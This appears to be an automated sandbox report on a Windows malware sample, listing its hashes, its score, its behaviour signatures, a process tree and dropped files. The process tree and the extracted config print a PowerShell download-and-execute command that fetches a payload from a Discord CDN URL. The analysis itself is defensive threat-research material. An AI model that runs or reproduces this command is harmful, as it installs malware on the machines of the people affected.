Overview

overview

10

Static

static

3

mixazed_20...20.exe

windows7-x64

10

mixazed_20...20.exe

windows10-2004-x64

10

mixazed_20...23.exe

windows7-x64

10

mixazed_20...23.exe

windows10-2004-x64

10

mixazed_20...04.exe

windows7-x64

10

mixazed_20...04.exe

windows10-2004-x64

10

mixazed_20...25.exe

windows7-x64

10

mixazed_20...25.exe

windows10-2004-x64

10

mixazed_20...06.exe

windows7-x64

10

mixazed_20...06.exe

windows10-2004-x64

10

mixazed_20...07.exe

windows7-x64

10

mixazed_20...07.exe

windows10-2004-x64

10

mixazed_20...48.exe

windows7-x64

10

mixazed_20...48.exe

windows10-2004-x64

10

mixsix_202...11.exe

windows7-x64

10

mixsix_202...11.exe

windows10-2004-x64

10

usfive_202...29.exe

windows7-x64

10

usfive_202...29.exe

windows10-2004-x64

10

usfive_202...19.exe

windows7-x64

10

usfive_202...19.exe

windows10-2004-x64

10

usfive_202...38.exe

windows7-x64

10

usfive_202...38.exe

windows10-2004-x64

10

usfive_202...22.exe

windows7-x64

10

usfive_202...22.exe

windows10-2004-x64

10

usfive_202...45.exe

windows7-x64

10

usfive_202...45.exe

windows10-2004-x64

10

usfive_202...26.exe

windows7-x64

10

usfive_202...26.exe

windows10-2004-x64

10

usfive_202...26.exe

windows7-x64

10

usfive_202...26.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-11-2024 21:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mixazed_20210808-075823.exe

  • Size

    14KB

  • MD5

    dfe4e4a9d0d02a17fd575b94291dfcfa

  • SHA1

    4a8a44719272b2bd5b067f6b3439bb23f7ec15c6

  • SHA256

    d693bdb8fc82b3385c47a02ef9ac465a2470c1f345a5f0b7dbd835c9c7b40115

  • SHA512

    18b540a5a322350d63b5928debb80a30b2ab10419a87e11e9f6134584383ecc5a55131f5c2473c82a7686b5b52a46454b2ac62332f4cf946218071e7a784e8d7

  • SSDEEP

    384:GEhQiqMOt/RzLo07xNqj/afC/ery7s62HG:iiqtt/Rzc07xEaBO7gHG

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cdn.discordapp.com/attachments/873486687085428759/873677044964282429/main_module.txt-chimera-172013.bin

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\mixazed_20210808-075823.exe
    "C:\Users\Admin\AppData\Local\Temp\mixazed_20210808-075823.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2452
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4320
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4484
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3928
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4488
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2476
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2240
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/873486687085428759/873677044964282429/main_module.txt-chimera-172013.bin')
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/873486687085428759/873677044964282429/main_module.txt-chimera-172013.bin')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4476

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    0774a05ce5ee4c1af7097353c9296c62

    SHA1

    658ff96b111c21c39d7ad5f510fb72f9762114bb

    SHA256

    d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

    SHA512

    104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    92df7e9e4db63ae1834d926664bdf942

    SHA1

    8c87bf38e5d7d12d1f01a38934fa0c001c1b3dcf

    SHA256

    ca851a2b82c5ffb96fe40efb98addb3d3fdfc11ffc6e80b63d3aecdc2c2fa31a

    SHA512

    2e30257ed3f4296d11a02609280dcf1703ea98fca1d850c69f1fe22bbe85ac563335b6ba085d28d00f456e8b8ce1222404d01258317d0eff744766860c49904b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    9f8f585432deb6f362aa7329c33816c6

    SHA1

    2bc191708f7bb5e07665f0379d8a2055f10a8c6d

    SHA256

    f60478c256aa967dee0358e31d4237aace92362b4ed647f9c5bffed5d0700c3d

    SHA512

    bbe80981254b14e5f7c2cda9c86f81efbecd4db5223ddc2da629a381013779d16a1c5303d83684ae373f90e3f7b8e57607a70becacfca57002a682b2cf6af6d9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    200208ae4b1a7c6276c589717e616ed7

    SHA1

    7817d6b33ff7b273c66f538abc75df5992233666

    SHA256

    1ff85fd49667ea17cbdc4758791e574f50985647b56eb867ebb5b34cc80a812f

    SHA512

    b3c1720a5384721ac03df58726ce18499ffcf47ddf212614b29b405f2dc6a97c06f3380bb7570d7f6dfe5575c690026d0e459495c5c86a487e26146271cdcfe1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    204c5c6d114aa1ad6f2250ac1156bf97

    SHA1

    f2f75ee9ede78c49af94503176fb5b055e4240c2

    SHA256

    9b44de0279c78856f1750ccf249e49ab149b2871f3129561d78b8400f77b1994

    SHA512

    07ede4904e2fe1d8d92ec8cadc3c37857b27604701a366f56982970778339cefaa560f280f4e63431f90061b278d11631706079a46993228456eb6b1cf5fbf53

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    8cc255d9f4e8c2c47c9ad967e3f5ac70

    SHA1

    40230aaeb761f90aa5c8973c3cf36c73f2f4df67

    SHA256

    8d16dc00d353df022e696fee666f4f3bc3a28c4b083ca18e7def646570083283

    SHA512

    99c8592408af497dfab8d31bb771791478beda65c610f76c34e8afd5613774f5a46e991f1df203f8a19bd180bf43c050c117ea00eb7ebbbc50b538f0c09f5cd3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eun4wiy3.gkl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3928-44-0x00000000749A0000-0x0000000075150000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3928-32-0x00000000054F0000-0x0000000005844000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3928-31-0x00000000749A0000-0x0000000075150000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3928-30-0x00000000749A0000-0x0000000075150000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3928-29-0x00000000749A0000-0x0000000075150000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4484-6-0x00000000056B0000-0x0000000005716000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4484-17-0x0000000005950000-0x0000000005CA4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4484-22-0x00000000064B0000-0x00000000064D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4484-23-0x00000000075E0000-0x0000000007B84000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4484-24-0x0000000008210000-0x000000000888A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4484-27-0x00000000749A0000-0x0000000075150000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4484-20-0x0000000006F80000-0x0000000007016000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4484-19-0x0000000005FE0000-0x000000000602C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4484-18-0x0000000005F90000-0x0000000005FAE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4484-21-0x0000000006460000-0x000000000647A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4484-0-0x00000000749AE000-0x00000000749AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4484-7-0x0000000005720000-0x0000000005786000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4484-5-0x0000000004FC0000-0x0000000004FE2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4484-4-0x00000000749A0000-0x0000000075150000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4484-3-0x0000000005080000-0x00000000056A8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4484-2-0x00000000749A0000-0x0000000075150000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4484-1-0x00000000049C0000-0x00000000049F6000-memory.dmp

    Filesize

    216KB

    Download